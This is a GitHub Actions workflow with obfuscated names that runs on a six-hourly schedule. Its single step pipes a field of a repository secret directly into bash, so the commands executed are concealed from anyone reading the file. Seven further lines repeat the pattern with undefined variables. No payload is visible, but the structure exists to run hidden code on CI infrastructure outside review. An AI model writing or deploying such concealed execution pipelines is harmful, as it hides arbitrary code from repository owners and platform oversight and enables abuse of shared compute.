name: caocao19870105
on:
  workflow_dispatch:
  schedule:
    - cron: '52 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caocao19870105
        env:
          h741: ${{ secrets.h741 }}
        run: |
          echo $h741 | jq -r .lp5606 | /bin/bash
          echo $nc8378 | jq -r .lxkbp3508 | /bin/bash
          echo $lf400 | jq -r .q7 | /bin/bash
          echo $ub72963 | jq -r .n5793 | /bin/bash
          echo $esy61 | jq -r .fcwh82180 | /bin/bash
          echo $sdglr83219 | jq -r .yttp42 | /bin/bash
          echo $pvv8283 | jq -r .obt113 | /bin/bash
          echo $cb49 | jq -r .hlbwy0 | /bin/bash

